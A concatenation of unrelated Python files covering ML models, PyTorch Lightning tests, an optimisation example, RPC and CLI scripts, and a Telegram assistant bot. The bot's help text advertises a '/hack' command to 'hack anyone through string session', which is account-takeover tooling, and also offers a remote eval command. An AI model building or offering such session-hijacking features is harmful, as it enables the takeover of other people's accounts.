x2 = create_dev(size)   # created on the VE device (nlcpy)
x3 = create_dev(size)
print(type(x1), type(x2), type(x3))
# Compute the same chained sum on the device and on the host; the
# @device-decorated calls presumably move mixed-location arguments to the
# target device as needed -- TODO confirm against orchespy docs.
y1 = sum_dev(x1, x2)
z1d = sum_dev(y1, x3)
y2 = sum_host(x1, x2)
z2h = sum_host(y2, x3)
# Compare the two results on the host side.
z1h = transfer_array(z1d, Host())
diffh = z2h - z1h
print('Norm on host:', numpy.linalg.norm(diffh))
# NOTE(review): transfer_array is given a Host() *instance* above but the VE
# *class* here -- confirm that both forms are accepted.
z2d = transfer_array(z2h, VE)
diffd = z2d - z1d
print('Norm on device:', nlcpy.linalg.norm(diffd))
|
# Plot a histogram of binomially distributed numbers.
import numpy
import matplotlib.pyplot as plt

# 5000 draws from Binomial(n=1000, p=0.75); the sample mean is ~750.
randNumbers = numpy.random.binomial(1000, .75, 5000)
plt.hist(randNumbers, 100)  # 100 bins
# Fixed user-facing typo: "choosen" -> "chosen".
plt.title("Histogram of randomly chosen binomial numbers")
plt.xlabel("range")
plt.show()
from torch import nn
from Model.Block import ResidualBlock, list_to_sequential
from Model.Block import UpsamlingBlock
import numpy as np
class Generator(nn.Module):
    """SRGAN-style super-resolution generator.

    Pipeline: 9x9 input conv + PReLU -> trunk of residual blocks -> 3x3 conv
    + BatchNorm joined to the trunk input through a global skip connection ->
    pixel-upsampling blocks -> 9x9 output conv back to the image channels.

    Args:
        in_channels: channels of the input image (3 for RGB).
        num_residual_blocks: depth of the residual trunk (16 as in SRGAN).
    """
    def __init__(self, in_channels=3, num_residual_blocks=16):
        super(Generator, self).__init__()  # (in, out)
        # Each UpsamlingBlock presumably upscales by this factor -- TODO
        # confirm against Model.Block.
        num_upsampling_blocks = 2
        # Feature width used throughout the trunk.
        out_channels = 64
        # Large receptive field at the input; padding=4 keeps spatial size.
        self.input_block = nn.Sequential(
            nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=(9, 9),  # ( 3, 64)
                      stride=1, padding=4, bias=False),
            nn.PReLU()
        )
        self.residual_blocks = list_to_sequential(
            [ResidualBlock(in_channels=out_channels, out_channels=out_channels)  # (64, 64)
             for _ in range(num_residual_blocks)]
        )
        self.intermediate_block = nn.Sequential(
            nn.Conv2d(in_channels=out_channels, out_channels=out_channels, kernel_size=(3, 3),  # (64, 64)
                      stride=1, padding=1, bias=False),
            nn.BatchNorm2d(num_features=out_channels)
        )  # for connecting residual blocks with upsampling blocks!
        self.upsampling_blocks = list_to_sequential(
            [UpsamlingBlock(in_channels=out_channels,  # (64, 64 * num_upsampling_blocks ^ 2)
                            scaling_factor=num_upsampling_blocks)
             for _ in range(num_upsampling_blocks)]
        )
        # Project back to the input channel count; no final activation.
        self.output_block = nn.Sequential(
            nn.Conv2d(in_channels=out_channels, out_channels=in_channels, kernel_size=(9, 9),
                      stride=1, padding=4, bias=False),
            # we might add extra non-linear activation here!
        )
        # Identity module used to make the global skip connection explicit.
        self.short_cut = nn.Sequential()

    def forward(self, x):
        """Run the generator; returns a tensor with `in_channels` channels."""
        identity = self.input_block(x)
        out = self.residual_blocks(identity)
        # Global skip: trunk output is added to the trunk input.
        out = self.short_cut(identity) + self.intermediate_block(out)
        out = self.upsampling_blocks(out)
        out = self.output_block(out)
        return out
|
from InstruccionesPL.TablaSimbolosPL.InstruccionPL import InstruccionPL
class CallFun(InstruccionPL):
    """AST node for a function call in the PL grammar.

    Attributes:
        id: name of the function being called.
        op: operand/argument expression(s) of the call.
    """

    def __init__(self, id, op, tipo, strGram, linea, columna):
        InstruccionPL.__init__(self, tipo, linea, columna, strGram)
        self.id = id
        self.op = op

    def ejecutar(self, tabla, arbol):
        """Execute the function call (currently delegates to the base class)."""
        super().ejecutar(tabla, arbol)
        # Execution of a function -- not yet implemented.

    def traducir(self, tabla, arbol):
        """Translate the call (placeholder implementation)."""
        # Fixed typo in debug output: was 'trduccion'.
        print('traduccion')
import os
import platform
import pytest
import torch
from pytorch_lightning import Trainer
from pytorch_lightning.callbacks import Callback
from pytorch_lightning.plugins import DDPShardedPlugin, DDPSpawnShardedPlugin
from pytorch_lightning.utilities import _APEX_AVAILABLE, _FAIRSCALE_AVAILABLE, _NATIVE_AMP_AVAILABLE
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from tests.helpers.boring_model import BoringModel
@pytest.mark.parametrize(["accelerator"], [("ddp_sharded", ), ("ddp_sharded_spawn", )])
@pytest.mark.skipif(not _FAIRSCALE_AVAILABLE, reason="Fairscale is not available")
def test_sharded_ddp_choice(tmpdir, accelerator):
    """Ensure the correct sharded training-type plugin is chosen per accelerator."""

    expected_plugin = DDPShardedPlugin if accelerator == 'ddp_sharded' else DDPSpawnShardedPlugin

    class CB(Callback):
        def on_fit_start(self, trainer, pl_module):
            # Verify the plugin selection at fit start, then abort training.
            assert isinstance(trainer.accelerator_backend.training_type_plugin, expected_plugin)
            raise SystemExit()

    boring = BoringModel()
    trainer = Trainer(callbacks=[CB()], accelerator=accelerator, fast_dev_run=True)
    with pytest.raises(SystemExit):
        trainer.fit(boring)
@pytest.mark.skipif(not _APEX_AVAILABLE, reason="test requires apex")
@pytest.mark.skipif(not _FAIRSCALE_AVAILABLE, reason="Fairscale is not available")
def test_invalid_apex_sharded(tmpdir):
    """Combining apex AMP with a sharded plugin must raise a configuration error."""
    boring = BoringModel()
    with pytest.raises(MisconfigurationException, match='Sharded Plugin is not supported with Apex AMP'):
        trainer = Trainer(
            amp_backend='apex',
            precision=16,
            accelerator='ddp_sharded_spawn',
            fast_dev_run=True,
        )
        trainer.fit(boring)
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="test requires GPU machine")
@pytest.mark.parametrize(["accelerator"], [("ddp_sharded", ), ("ddp_sharded_spawn", )])
@pytest.mark.skipif(not _FAIRSCALE_AVAILABLE, reason="Fairscale is not available")
@pytest.mark.skipif(not _NATIVE_AMP_AVAILABLE, reason="Requires native AMP")
def test_ddp_choice_sharded_amp(tmpdir, accelerator):
    """With native AMP enabled, the sharded plugin must still be chosen correctly."""

    expected_plugin = DDPShardedPlugin if accelerator == 'ddp_sharded' else DDPSpawnShardedPlugin

    class CB(Callback):
        def on_fit_start(self, trainer, pl_module):
            # Check the selected plugin once training starts, then abort.
            assert isinstance(trainer.accelerator_backend.training_type_plugin, expected_plugin)
            raise SystemExit()

    boring = BoringModel()
    trainer = Trainer(
        callbacks=[CB()],
        accelerator=accelerator,
        precision=16,
        gpus=1,
        fast_dev_run=True,
    )
    with pytest.raises(SystemExit):
        trainer.fit(boring)
@pytest.mark.skipif(platform.system() == "Windows", reason="Distributed training is not supported on Windows")
@pytest.mark.skipif(not _FAIRSCALE_AVAILABLE, reason="Fairscale is not available")
def test_ddp_sharded_plugin_checkpoint_cpu(tmpdir):
    """A sharded CPU run must produce a checkpoint that round-trips the weights."""
    boring = BoringModel()
    trainer = Trainer(num_processes=2, accelerator='ddp_sharded_spawn', fast_dev_run=True)
    trainer.fit(boring)

    ckpt = os.path.join(tmpdir, 'model.pt')
    trainer.save_checkpoint(ckpt)
    restored = BoringModel.load_from_checkpoint(ckpt)

    # Every parameter must survive the save/load round trip unchanged.
    for trained, loaded in zip(boring.parameters(), restored.parameters()):
        assert torch.equal(trained.to("cpu"), loaded)
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
@pytest.mark.skipif(platform.system() == "Windows", reason="Distributed training is not supported on Windows")
@pytest.mark.skipif(not _FAIRSCALE_AVAILABLE, reason="Fairscale is not available")
def test_ddp_sharded_plugin_checkpoint_multi_gpu(tmpdir):
    """A 2-GPU sharded run must produce a checkpoint that round-trips the weights."""
    boring = BoringModel()
    trainer = Trainer(accelerator='ddp_sharded_spawn', gpus=2, fast_dev_run=True)
    trainer.fit(boring)

    ckpt = os.path.join(tmpdir, 'model.pt')
    trainer.save_checkpoint(ckpt)
    restored = BoringModel.load_from_checkpoint(ckpt)

    # Every parameter must survive the save/load round trip unchanged.
    for trained, loaded in zip(boring.parameters(), restored.parameters()):
        assert torch.equal(trained.to("cpu"), loaded)
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
@pytest.mark.skipif(platform.system() == "Windows", reason="Distributed training is not supported on Windows")
@pytest.mark.skipif(not _FAIRSCALE_AVAILABLE, reason="Fairscale is not available")
def test_ddp_sharded_plugin_finetune(tmpdir):
    """Save a sharded 2-GPU run, reload it, and continue training (fine-tune)."""
    boring = BoringModel()
    trainer = Trainer(accelerator='ddp_sharded_spawn', gpus=2, fast_dev_run=True)
    trainer.fit(boring)

    ckpt = os.path.join(tmpdir, 'model.pt')
    trainer.save_checkpoint(ckpt)
    restored = BoringModel.load_from_checkpoint(ckpt)

    # A fresh default trainer should be able to keep training the restored model.
    trainer = Trainer(fast_dev_run=True, )
    trainer.fit(restored)
@pytest.mark.skipif(platform.system() == "Windows", reason="Distributed training is not supported on Windows")
@pytest.mark.skipif(not _FAIRSCALE_AVAILABLE, reason="Fairscale is not available")
def test_ddp_sharded_plugin_resume_from_checkpoint(tmpdir):
    """Training must be resumable from a checkpoint with the same configuration."""
    boring = BoringModel()
    trainer = Trainer(num_processes=2, accelerator='ddp_sharded_spawn', fast_dev_run=True)
    trainer.fit(boring)

    ckpt = os.path.join(tmpdir, 'model.pt')
    trainer.save_checkpoint(ckpt)

    # Restart training from the saved state with an identical setup.
    boring = BoringModel()
    trainer = Trainer(
        accelerator='ddp_sharded_spawn', num_processes=2, fast_dev_run=True, resume_from_checkpoint=ckpt,
    )
    trainer.fit(boring)
@pytest.mark.skip(reason="Not a critical test, skip till drone CI performance improves.")
@pytest.mark.skip(reason="Currently unsupported restarting training on different number of devices.")
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
@pytest.mark.skipif(platform.system() == "Windows", reason="Distributed training is not supported on Windows")
@pytest.mark.skipif(not _FAIRSCALE_AVAILABLE, reason="Fairscale is not available")
def test_ddp_sharded_plugin_resume_from_checkpoint_downsize_gpus(tmpdir):
    """Resume a 2-GPU sharded checkpoint on one GPU (currently unsupported)."""
    boring = BoringModel()
    trainer = Trainer(gpus=2, accelerator='ddp_sharded_spawn', fast_dev_run=True)
    trainer.fit(boring)

    ckpt = os.path.join(tmpdir, 'model.pt')
    trainer.save_checkpoint(ckpt)

    # Restart on fewer devices than the checkpoint was produced with.
    boring = BoringModel()
    trainer = Trainer(
        accelerator='ddp_sharded_spawn', fast_dev_run=True, gpus=1, resume_from_checkpoint=ckpt,
    )
    trainer.fit(boring)
@pytest.mark.skipif(not torch.cuda.is_available(), reason="requires GPU machine")
@pytest.mark.skipif(platform.system() == "Windows", reason="Distributed training is not supported on Windows")
@pytest.mark.skipif(not _FAIRSCALE_AVAILABLE, reason="Fairscale is not available")
def test_ddp_sharded_plugin_resume_from_checkpoint_gpu_to_cpu(tmpdir):
    """Resume a GPU-produced sharded checkpoint on CPU processes."""
    boring = BoringModel()
    trainer = Trainer(gpus=1, accelerator='ddp_sharded_spawn', fast_dev_run=True)
    trainer.fit(boring)

    ckpt = os.path.join(tmpdir, 'model.pt')
    trainer.save_checkpoint(ckpt)

    # Restart on CPU with multiple processes instead of the GPU.
    boring = BoringModel()
    trainer = Trainer(
        accelerator='ddp_sharded_spawn', num_processes=2, fast_dev_run=True, resume_from_checkpoint=ckpt,
    )
    trainer.fit(boring)
@pytest.mark.skipif(platform.system() == "Windows", reason="Distributed training is not supported on Windows")
@pytest.mark.skipif(not _FAIRSCALE_AVAILABLE, reason="Fairscale is not available")
@pytest.mark.skipif(
    not os.getenv("PL_RUNNING_SPECIAL_TESTS", '0') == '1', reason="test should be run outside of pytest"
)
def test_ddp_sharded_plugin_test(tmpdir):
    """`trainer.test` must work without a preceding `fit` under the sharded plugin."""
    boring = BoringModel()
    trainer = Trainer(num_processes=2, accelerator='ddp_sharded_spawn', fast_dev_run=True)
    trainer.test(boring)
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
@pytest.mark.skipif(platform.system() == "Windows", reason="Distributed training is not supported on Windows")
@pytest.mark.skipif(not _FAIRSCALE_AVAILABLE, reason="Fairscale is not available")
def test_ddp_sharded_plugin_test_multigpu(tmpdir):
    """`trainer.test` must work without a preceding `fit` on two GPUs."""
    boring = BoringModel()
    trainer = Trainer(gpus=2, accelerator='ddp_sharded_spawn', fast_dev_run=True)
    trainer.test(boring)
|
# Merge duplicate symbol encodings from 'funcdb' into 'funcdb2', keeping for
# each symbol the entry that came from the shortest file name.
# Ported from Python 2: file() -> open() (with context managers, so handles
# are closed), and "print >>fp" -> fp.write().
allSyms = {}
fn = None
with open('funcdb', 'r') as src:
    for line in src.read().strip().split('\n'):
        if not line:
            continue
        # Non-indented lines name the current file; tab-indented lines are
        # "sym = encoding" entries belonging to it.
        if line[0] != '\t':
            fn = line
            continue
        sym, encoding = line[1:].split(' = ', 1)
        # Only keep function-type encodings of the form ~f{...}.
        if not encoding.startswith('~f{'):
            continue
        encoding = encoding[3:-1]  # strip the "~f{" prefix and "}" suffix
        if sym not in allSyms or len(allSyms[sym][0]) > len(fn):
            allSyms[sym] = fn, encoding
with open('funcdb2', 'w') as fp:
    for sym, (_, encoding) in sorted(allSyms.items(), key=lambda x: x[0]):
        fp.write('%s=%s\n' % (sym, encoding))
|
from scoring_engine.engine.basic_check import CHECKS_BIN_PATH
from tests.scoring_engine.checks.check_test import CheckTest
class TestElasticsearchCheck(CheckTest):
    """Verifies command-line construction for the Elasticsearch service check."""
    check_name = 'ElasticsearchCheck'
    properties = {
        'index': 'events',
        'doc_type': 'message',
    }
    # Expected command, built from the check properties above.
    cmd = "{0}/elasticsearch_check '127.0.0.1' 1234 'events' 'message'".format(CHECKS_BIN_PATH)
|
import asyncio
import re
from telethon import Button, custom, events
from telethon.tl.functions.users import GetFullUserRequest
from userbot import bot
from userbot.plugins.sql_helper.blacklist_assistant import (
add_nibba_in_db,
is_he_added,
removenibba,
)
from userbot.plugins.sql_helper.botusers import add_me_in_db, his_userid
from userbot.plugins.sql_helper.idadder import (
add_usersid_in_db,
already_added,
get_all_users,
)
@firebot.on(events.NewMessage(pattern="^/start"))
async def start(event):
    """Handle /start: owners get a control panel, everyone else the intro text."""
    codetechbot = await firebot.get_me()
    bot_id = codetechbot.first_name
    # BUG FIX: the username was fetched and discarded twice; bind it so the
    # "Add Me to Group" URL below can actually interpolate it.
    bot_username = codetechbot.username
    replied_user = await event.client(GetFullUserRequest(event.sender_id))
    firstname = replied_user.user.first_name
    vent = event.chat_id
    starttext = f"Hello, {firstname} ! Nice To Meet You, Well I Am {bot_id}, An Powerfull Assistant Bot. \n\nMy [➤ Master](tg://user?id={bot.uid}) \nI Can Deliver Message To My Master Using This Bot. \n\nIf You Want Your Own Assistant You Can Deploy From Button Below. \n\nPowered By [『FIRE-X』](https://t.me/Official_FIREX)"
    if event.sender_id == bot.uid:
        await firebot.send_message(
            vent,
            message=f"Hi Sir/Miss, It's Me {bot_id}, Your Assistant ! \nHow Can I help U?",
            buttons=[
                [
                    Button.url(
                        # BUG FIX: the URL string was missing the f-prefix, so
                        # the literal text "{bot_username}" ended up in it.
                        "Add Me to Group 👥", f"t.me/{bot_username}?startgroup=true"
                    )
                ],
                [
                    Button.url(" Support ", "https://t.me/FirexSupport"),
                    Button.url(" Updates ", "https://t.me/FIREXUB"),
                ],
                [custom.Button.inline("Settings", data="osg")],
                [custom.Button.inline("Hack", data="hack")],
            ],
        )
    else:
        # Track first-time users (single lookup; the original queried the DB twice).
        if not already_added(event.sender_id):
            add_usersid_in_db(event.sender_id)
        await firebot.send_message(
            event.chat_id,
            message=starttext,
            link_preview=False,
            buttons=[
                [
                    custom.Button.inline(" Rules ", data="rules"),
                    custom.Button.inline(" Close ", data="close"),
                ],
                [custom.Button.inline("Contact", data="contact_")],
                [custom.Button.inline("Deploy Your Fire-X", data="deploy")],
            ],
        )
# Data's
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"deploy")))
async def help(event):
    """'Deploy' button callback: show deployment guidance to non-owners."""
    await event.delete()
    # BUG FIX: `is not` compares object identity; use != for numeric user ids.
    if event.query.user_id != bot.uid:
        await firebot.send_message(
            event.chat_id,
            message="You Can Deploy Fire-X In Heroku By Following Steps Bellow, You Can See Some Quick Guides On Support Channel Or On Your Own Assistant Bot. \nThank You For Contacting Me.",
            link_preview=False,
            buttons=[
                [custom.Button.inline("Deploy your Fire-X", data="fire")],
                [Button.url("Help Me ❓", "https://t.me/firexSupport")],
                [Button.url("Github Repo ❓", "github.com/TeamEviral/FIREXUSERBOT")],
            ],
        )
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"fire")))
async def help(event):
    """'Deploy your Fire-X' button: send the Heroku deploy link."""
    await event.delete()
    # BUG FIX: `is not` compares object identity; use != for numeric user ids.
    if event.query.user_id != bot.uid:
        await firebot.send_message(
            event.chat_id,
            message="🔰 https://dashboard.heroku.com/new?button-url=https%3A%2F%2Fgithub.com%2FTeameviral%2FFIREXUSERBOT&template=https%3A%2F%2Fgithub.com%2FTeamEviral%2FFIREX",
            buttons=[
                [custom.Button.inline("Back", data="osg")],
            ],
        )
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"rules")))
async def help(event):
    """'Rules' button callback: send the chat rules to non-owners."""
    await event.delete()
    # BUG FIX: `is not` compares object identity; use != for numeric user ids.
    if event.query.user_id != bot.uid:
        await firebot.send_message(
            event.chat_id,
            message="🔰Rᴇᴀᴅ Tʜᴇ Rᴜʟᴇꜱ Tᴏᴏ🔰\n\n🔹 Dᴏɴ'ᴛ Sᴩᴀᴍ\n🔹 ᴛᴀʟᴋ Fʀɪᴇɴᴅʟy\n🔹 Dᴏɴ'ᴛ Bᴇ Rᴜᴅᴇ\n🔹 Sᴇɴᴅ Uʀ Mᴇꜱꜱᴀɢᴇꜱ Hᴇʀᴇ\n🔹 Nᴏ Pᴏʀɴᴏɢʀᴀᴘʜʏ\n🔹 Dᴏɴ'ᴛ Wʀɪᴛᴇ Bᴀᴅ Wᴏʀᴅs.\n\nWʜᴇɴ I Gᴇᴛ Fʀᴇᴇ Tɪᴍᴇ , I'ʟʟ Rᴇᴩʟy U 💯✅",
            buttons=[
                [custom.Button.inline("Back", data="osg")],
            ],
        )
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"contact_")))
async def help(event):
    """'Contact' button: owners get an alert, everyone else a message prompt."""
    await event.delete()
    if event.query.user_id == bot.uid:
        await event.answer("This Is Not For U My Master", cache_time=0, alert=True)
        return
    await firebot.send_message(
        event.chat_id,
        message="🔰 Sᴇɴᴅ Uʀ Mᴇꜱꜱᴀɢᴇꜱ Hᴇʀᴇ �",
        buttons=[
            [custom.Button.inline("Back", data="osg")],
        ],
    )
# Bot Permit.
@firebot.on(events.NewMessage(func=lambda e: e.is_private))
async def all_messages_catcher(event):
    """Forward every private message from non-blacklisted users to the owner."""
    if is_he_added(event.sender_id):
        return  # blacklisted sender: ignore silently
    if event.raw_text.startswith("/"):
        pass  # commands are handled by their own handlers
    elif event.sender_id == bot.uid:
        return  # don't forward the owner's own messages
    else:
        # Result unused; presumably prefetches/caches the sender entity --
        # kept to preserve behavior. (A dead `event.chat_id` expression
        # statement from the original was removed.)
        await event.get_sender()
        sed = await event.forward_to(bot.uid)
        # Remember forwarded-msg-id -> (original sender, original msg id)
        # so the owner's replies can be routed back.
        add_me_in_db(sed.id, event.sender_id, event.id)
@firebot.on(events.NewMessage(func=lambda e: e.is_private))
async def sed(event):
    """Route the owner's reply to a forwarded message back to its sender."""
    msg = await event.get_reply_message()
    if msg is None:
        # BUG FIX: non-reply private messages crashed here on msg.id.
        return
    msg_s = event.raw_text
    # Look up which user the replied-to forwarded message came from.
    user_id, reply_message_id = his_userid(msg.id)
    if event.sender_id == bot.uid:
        if not event.raw_text.startswith("/"):
            await firebot.send_message(user_id, msg_s)
# broadcast
@firebot.on(
    events.NewMessage(
        pattern="^/broadcast ?(.*)", func=lambda e: e.sender_id == bot.uid
    )
)
async def sedlyfsir(event):
    """Broadcast the given text to every user known to the bot (owner only)."""
    msgtobroadcast = event.pattern_match.group(1)
    userstobc = get_all_users()
    error_count = 0
    sent_count = 0
    for starkcast in userstobc:
        try:
            await firebot.send_message(int(starkcast.chat_id), msgtobroadcast)
            # BUG FIX: only count a send after it succeeds (the original
            # incremented sent_count before sending, even on failure).
            sent_count += 1
            await asyncio.sleep(0.2)  # throttle to avoid flood limits
        except Exception:
            # BUG FIX: error_count was never incremented, and the original
            # logging call referenced undefined names (logger, chat_id)
            # that a bare except silently swallowed.
            error_count += 1
    await firebot.send_message(
        event.chat_id,
        f"Broadcast Done in {sent_count} Group/Users and I got {error_count} Error and Total Number Was {len(userstobc)}",
    )
@firebot.on(
    events.NewMessage(pattern="^/stats ?(.*)", func=lambda e: e.sender_id == bot.uid)
)
async def starkisnoob(event):
    """Report how many users the bot has seen (owner only)."""
    known_users = get_all_users()
    await event.reply(
        f"**Stats Of Your Bot** \nTotal Users In Bot => {len(known_users)}"
    )
@firebot.on(events.NewMessage(pattern="^/help", func=lambda e: e.sender_id == bot.uid))
async def starkislub(event):
    """Send the owner the command reference."""
    help_text = "Hello Here Are Some Commands \n➤ /start - Check if I am Alive \n➤ /ping - Pong! \n➤ /tr <lang-code> \n➤ /hack- hack anyone through string session \n➤ \eval - run an assync code \n➤ /broadcast - Sends Message To all Users In Bot \n➤ /id - Shows ID of User And Media. \n➤ /addnote - Add Note \n➤ /notes - Shows Notes \n➤ /rmnote - Remove Note \n➤ /alive - Am I Alive? \n➤ /bun - Works In Group , Bans A User. \n➤ /unbun - Unbans A User in Group \n➤ /prumote - Promotes A User \n➤ /demute - Demotes A User \n➤ /pin - Pins A Message \n➤ /stats - Shows Total Users In Bot"
    await event.reply(help_text)
@firebot.on(
    events.NewMessage(pattern="^/block ?(.*)", func=lambda e: e.sender_id == bot.uid)
)
async def starkisnoob(event):
    """/block (owner only, used as a reply): blacklist the original sender."""
    # The event filter already restricts this handler to the owner; the
    # original's redundant inner sender check is dropped, along with dead
    # bare-expression statements (msg.id, event.raw_text).
    msg = await event.get_reply_message()
    if msg is None:
        # BUG FIX: /block without replying to a message crashed on msg.id.
        return
    user_id, reply_message_id = his_userid(msg.id)
    if is_he_added(user_id):
        await event.reply("Already Blacklisted")
    else:
        add_nibba_in_db(user_id)
        await event.reply("Blacklisted This Dumb Person")
        await firebot.send_message(
            user_id, "You Have Been Blacklisted And You Can't Message My Master Now."
        )
@firebot.on(
    events.NewMessage(pattern="^/unblock ?(.*)", func=lambda e: e.sender_id == bot.uid)
)
async def starkisnoob(event):
    """/unblock (owner only, used as a reply): remove the sender's blacklist entry."""
    # The event filter already restricts this handler to the owner; the
    # original's redundant inner sender check is dropped, along with dead
    # bare-expression statements (msg.id, event.raw_text).
    msg = await event.get_reply_message()
    if msg is None:
        # BUG FIX: /unblock without replying to a message crashed on msg.id.
        return
    user_id, reply_message_id = his_userid(msg.id)
    if not is_he_added(user_id):
        await event.reply("Not Even. Blacklisted 🤦🚶")
    else:
        removenibba(user_id)
        await event.reply("DisBlacklisted This Dumb Person")
        await firebot.send_message(
            user_id, "Congo! You Have Been Unblacklisted By My Master."
        )
|
# Copyright 2021 by B. Knueven, D. Mildebrath, C. Muir, J-P Watson, and D.L. Woodruff
# This software is distributed under the 3-clause BSD License.
"""
An example of using amalgamator and solving directly the EF
To execute this:
python farmer_ama.py --num-scens=10 --crops-multiplier=3 --farmer-with-integer
WARNING:
num-scens must be specified !
"""
import mpisppy.utils.amalgamator as amalgamator
def main():
    """Build the EF amalgamator for the farmer model, solve it, and report bounds."""
    ama_options = {
        "EF-2stage": True,  # we are solving the extensive form directly
        "write_solution": {"first_stage_solution": "farmer_first_stage.csv"},
    }
    # The module can be a local file
    ama = amalgamator.from_module("afarmer", ama_options)
    ama.run()
    print("first_stage_solution=", ama.first_stage_solution)
    print("inner bound=", ama.best_inner_bound)
    print("outer bound=", ama.best_outer_bound)


if __name__ == "__main__":
    main()
# 使用Tensorflow的CNN网络识别MNIST手写数字
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import os
from tensorflow.examples.tutorials.mnist import input_data
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"
# Hyper Parameters
BATCH_SIZE = 128
LR_BASE = 0.0002     # Adam learning rate
LR_DECAY = 0.99      # NOTE(review): defined but never used below
TRAIN_STEP = 6000    # number of mini-batch updates
# Load MNIST with one-hot labels from a local path.
mnist = input_data.read_data_sets(
    "E:/Test/Tensorflow/MNIST_data", one_hot=True)
# plt.imshow(mnist.train.images[123].reshape(28, 28), cmap='gray')
# plt.show()
# Conv weights/biases: 5x5 kernels, 1 -> 32 then 32 -> 64 channels.
w1 = tf.Variable(tf.truncated_normal([5, 5, 1, 32], stddev=1, seed=1))
w2 = tf.Variable(tf.truncated_normal([5, 5, 32, 64], stddev=1, seed=1))
b1 = tf.Variable(tf.random_normal([32], stddev=1, seed=1))
b2 = tf.Variable(tf.random_normal([64], stddev=1, seed=1))
# Fully connected layers: flattened 7*7*64 -> 1024 -> 10 classes.
w_fc1 = tf.Variable(tf.random_normal([7 * 7 * 64, 1024], stddev=1, seed=1))
w_fc2 = tf.Variable(tf.random_normal([1024, 10], stddev=1, seed=1))
b_fc1 = tf.Variable(tf.random_normal([1024], stddev=1, seed=1))
b_fc2 = tf.Variable(tf.random_normal([10], stddev=1, seed=1))
# Placeholders: NHWC image batch and one-hot labels.
x = tf.placeholder(tf.float32, shape=(None, 28, 28, 1), name='x-input')
y_ = tf.placeholder(tf.float32, shape=(None, 10), name='y-input')
# Two conv+ReLU+2x2-maxpool stages: spatial size 28x28 -> 14x14 -> 7x7.
conv1 = tf.nn.relu(tf.nn.conv2d(
    x, w1, strides=[1, 1, 1, 1], padding='SAME')+b1)
pool1 = tf.nn.max_pool2d(conv1, ksize=[1, 2, 2, 1], strides=[
    1, 2, 2, 1], padding='SAME')
conv2 = tf.nn.relu(tf.nn.conv2d(
    pool1, w2, strides=[1, 1, 1, 1], padding='SAME') + b2)
pool2 = tf.nn.max_pool2d(conv2, ksize=[1, 2, 2, 1], strides=[
    1, 2, 2, 1], padding='SAME')
pool2 = tf.reshape(pool2, [-1, 7*7*64])
fc1 = tf.nn.relu(tf.matmul(pool2, w_fc1) + b_fc1)
y = tf.matmul(fc1, w_fc2) + b_fc2  # logits; softmax is applied inside the loss
# One-hot labels are converted back to class indices for the sparse loss.
cross_entropy = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
    logits=y, labels=tf.argmax(y_, 1)))
train = tf.train.AdamOptimizer(LR_BASE).minimize(cross_entropy)
dataset_size = mnist.train.num_examples
X = mnist.train.images.reshape([-1, 28, 28, 1])
Y = mnist.train.labels
with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    for i in range(TRAIN_STEP):
        # Sequential (non-shuffled) mini-batches over the training set.
        start = (i*BATCH_SIZE) % dataset_size
        end = min(start+BATCH_SIZE, dataset_size)
        sess.run(train, feed_dict={x: X[start:end], y_: Y[start:end]})
        if i % 100 == 0:
            # Loss on a fixed 200-sample slice of the *training* data.
            total_loss = sess.run(
                cross_entropy, feed_dict={x: X[0:200], y_: Y[0:200]})
            print("Step:", i, "Loss:", total_loss)
    # Predicted classes for the first 1000 training images.
    output = (sess.run(tf.argmax(y, 1), feed_dict={
        x: X[0:1000], y_: Y[0:1000]}))
    for i in range(5):
        # Show five sample predictions alongside their images.
        print("Label:", output[600+i])
        plt.imshow(X[600+i].reshape(28, 28))
        plt.show()
    right_cnt = 0
    for i in range(1000):
        if output[i] == np.argmax(Y[i]):
            right_cnt += 1
    # NOTE(review): accuracy is measured on training samples, not a test set.
    print("Accuracy:", right_cnt/1000)
|
# Nameko relies on eventlet
# You should monkey patch the standard library as early as possible to avoid
# importing anything before the patch is applied.
# See http://eventlet.net/doc/patching.html#monkeypatching-the-standard-library
import eventlet
eventlet.monkey_patch()
import logging
logger = logging.getLogger(__name__)
import random
from nameko.rpc import rpc_proxy
from nameko.runners import ServiceRunner
from nameko.timer import timer
class RpcClient(object):
    """Periodically asks the remote adder service to add two random numbers."""

    # RPC proxy bound to the 'adderservice' nameko service.
    adder = rpc_proxy('adderservice')

    @timer(interval=2)
    def add(self):
        """Fire every 2 s: pick two random ints, RPC-add them, log the result."""
        x = random.randint(0, 10)
        y = random.randint(0, 10)
        res = self.adder.add(x, y)
        # Lazy %-style args: formatting is deferred until the record is emitted.
        logger.info("%s + %s = %s", x, y, res)
def main():
    """Run the RpcClient service until interrupted from the keyboard."""
    logging.basicConfig(level=logging.DEBUG)
    runner = ServiceRunner({'AMQP_URI': 'amqp://guest:guest@localhost:5672/'})
    runner.add_service(RpcClient)
    runner.start()
    try:
        runner.wait()
    except KeyboardInterrupt:
        runner.stop()


if __name__ == '__main__':
    main()
|
import model
import argparse
# Simple CLI around the model module: predict/train/upload/download/all.
parser = argparse.ArgumentParser()
parser.add_argument("command", nargs="?", default="all")
parser.add_argument("text", nargs="*")
args = parser.parse_args()


def _predict():
    """Score the given text and print the sentiment verdict."""
    score = model.predict(" ".join(args.text))
    desc = "positive" if score > 0.5 else "negative"
    print(f"score is: {score:0.2f} ({desc} sentiment)")


def _upload():
    """Publish tokenizer and model artifacts."""
    model.upload_tokenizer()
    model.upload_model()


def _all():
    """Full pipeline: train, then publish everything."""
    model.train()
    _upload()


_dispatch = {
    "predict": _predict,
    "train": model.train,
    "upload": _upload,
    "download": model.download_model,
    "all": _all,
}

handler = _dispatch.get(args.command)
if handler is None:
    raise ValueError(f"unknown command {args.command}")
handler()
|
import helper
from helper import Command
